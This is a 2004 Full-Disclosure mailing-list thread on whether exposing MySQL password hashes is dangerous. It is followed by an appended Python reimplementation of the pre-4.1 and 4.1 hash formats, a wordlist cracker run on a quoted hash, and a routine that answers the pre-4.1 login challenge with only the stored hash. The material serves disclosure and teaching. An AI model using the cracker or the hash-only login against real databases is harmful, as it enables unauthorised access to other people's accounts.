Re: [Full-Disclosure] mysql password cracking

From: Chris Anley (chris_at_ngssoftware.com)
Date: 10/11/04

    To: full-disclosure@lists.netsys.com
    Date: Mon, 11 Oct 2004 09:15:01 +0100
    
    

    Hey David,

    Re: allowing users to see other users' hashes - it's dangerous; don't do
    it if you don't have to.

    To precis what's in the paper (which I wrote btw), there are a few
    interesting points about mysql password hashes:

    1) In versions prior to 4.1, the password hash can be used to
    authenticate directly with the database, so you don't need to crack it.
    In other words, knowledge of the *hash* is what the authentication
    protocol tests, not knowledge of the password. Admittedly you'd need to
    modify your mysql client to authenticate this way but that's not too hard.

    2) In versions 4.1 or better (which are still Beta) MySQL uses SHA1 to
    hash the passwords, so the situation is a little better. You can still
    crack sha1 password hashes fairly easily though, depending on the
    password complexity and length. The hashing algorithm is to sha1 hash
    the password, then sha1 hash the resulting hash, in other words
    sha1(sha1(password)). Of course, if you're using 4.1 or better you're
    using beta software, against MySQL AB's recommendation.

    3) If you use 4.1 ensure it's at least 4.1.3, because of the
    authentication bug detailed in the paper which (briefly) lets any user
    authenticate without needing to know the password.

    If for some reason you have to have an untrusted user viewing another
    user's grants, you could do it safely a number of ways (assuming version
    4.0.x):

    a) Write a UDF to do it (probably the best solution)
    b) Write a batch script that periodically does the 'show grants', strips
    the password hashes out and then inserts the data into a table your user
    can see. Of course, the data won't be current, but that might be ok and
    you don't need to mess about with dangerous privs.
    c) Grant the user select privilege (only) on mysql.db, mysql.host,
    tables_priv, user_priv and every column of 'mysql.user' apart from
    'password', and 'select' their privs out manually. This may be
    dangerous, so be careful.

    Hope that helps... :o)

          -chris.

    Willem Koenings wrote:
    > hi,
    >
    >
    >>I'm wondering how dangerous it is to allow a user on a
    >>mysql db to view the grants for another user. Could
    >>they take the encrypted password data and possibly
    >>crack it? If they can, how easy is it?
    >
    >
    > under certain conditions it's quite easy, if you have
    > a hash:
    >
    > test.exe 57510426775c5b0f
    > Hash: 57510426775c5b0f
    > Trying length 3
    > Trying length 4
    > Trying length 5
    > Found pass: guest
    >
    >
    > some reading for you:
    >
    > http://www.ngssoftware.com/papers/HackproofingMySQL.pdf
    >
    > all the best,
    >
    > W.

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

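The three things discussed in this thread, worked through as an added example (this code is not from the original post, from the NGSSoftware paper, or from MySQL's sources; it is a from-scratch Python reimplementation of the two PASSWORD() formats and of the 3.23-style challenge/response): the pre-4.1 16-hex hash, the 4.1 `*` + sha1(sha1(password)) hash, a wordlist crack of the hash Willem posted (`57510426775c5b0f`), and the pre-4.1 scramble computed from the stored hash alone, which is the point behind Chris's item 1. The challenge bytes and the wordlist at the bottom are constructed for the demo.

```python
"""MySQL password hashes and the pre-4.1 challenge/response, reimplemented.

Added example; not the mailing-list author's code nor MySQL's own source.
Sample challenge and wordlist below are constructed for illustration.
"""
import hashlib
import math

MASK_31 = 0x7FFFFFFF
MASK_32 = 0xFFFFFFFF


def _hash323_words(data: bytes):
    """Core of the 3.23/4.0 PASSWORD() function: two 32-bit words."""
    nr1, nr2, add = 0x50305735, 0x12345671, 7
    for b in data:
        if b in b" \t":  # the old algorithm skips spaces and tabs
            continue
        nr1 = (nr1 ^ ((((nr1 & 63) + add) * b) + (nr1 << 8))) & MASK_32
        nr2 = (nr2 + ((nr2 << 8) ^ nr1)) & MASK_32
        add += b
    return nr1 & MASK_31, nr2 & MASK_31


def mysql323_hash(password: str) -> str:
    """PASSWORD() as stored by MySQL 3.23 / 4.0: 16 hex chars, unsalted."""
    return "%08x%08x" % _hash323_words(password.encode())


def mysql41_hash(password: str) -> str:
    """PASSWORD() from 4.1 on: '*' + uppercase hex of sha1(sha1(password))."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def crack(target: str, wordlist):
    """Offline guessing. Neither format is salted, so it is one hash per
    candidate and a stolen hash can be attacked at full speed."""
    if target.startswith("*"):
        hasher, want = mysql41_hash, target.upper()
    else:
        hasher, want = mysql323_hash, target.lower()
    for word in wordlist:
        if hasher(word) == want:
            return word
    return None


class _Rand:
    """The generator the 3.23 scramble uses; seeded from hash words XOR
    challenge-hash words, so the password itself is never needed."""
    MAX = 0x3FFFFFFF

    def __init__(self, seed1: int, seed2: int):
        self.s1 = seed1 % self.MAX
        self.s2 = seed2 % self.MAX

    def rnd(self) -> float:
        self.s1 = (self.s1 * 3 + self.s2) % self.MAX
        self.s2 = (self.s1 + self.s2 + 33) % self.MAX
        return self.s1 / float(self.MAX)


def scramble_323(challenge: bytes, password_hash: str) -> bytes:
    """Pre-4.1 client response. The input is the stored 16-hex *hash*: anyone
    who can read mysql.user.password can answer the challenge with it."""
    h0, h1 = int(password_hash[:8], 16), int(password_hash[8:], 16)
    m0, m1 = _hash323_words(challenge)
    r = _Rand(h0 ^ m0, h1 ^ m1)
    out = [int(math.floor(r.rnd() * 31)) + 64 for _ in challenge]
    extra = int(math.floor(r.rnd() * 31))
    return bytes(c ^ extra for c in out)


def check_scramble_323(response: bytes, challenge: bytes, stored_hash: str) -> bool:
    """Server side: recompute the expected response from the stored hash and
    compare. Note it has exactly the same inputs as the client."""
    return response == scramble_323(challenge, stored_hash)


if __name__ == "__main__":
    leaked = "57510426775c5b0f"  # the hash from the quoted message
    print("crack:", crack(leaked, ["admin", "secret", "guest"]))
    print("4.1 hash of 'password':", mysql41_hash("password"))
    chal = b"Ab3$kz9Q"  # constructed 8-byte server challenge
    resp = scramble_323(chal, leaked)  # client holds only the hash
    print("hash-only login accepted:", check_scramble_323(resp, chal, leaked))
```

The `scramble_323` / `check_scramble_323` pair is the whole of Chris's first point: the server verifies against the hash it stores, and the client response is a function of that same hash, so a read on `mysql.user.password` in 3.23/4.0 is equivalent to the password. For 4.1+ the `*`-prefixed value is a plain double SHA-1 with no salt, which is why `crack` handles both formats with the same loop.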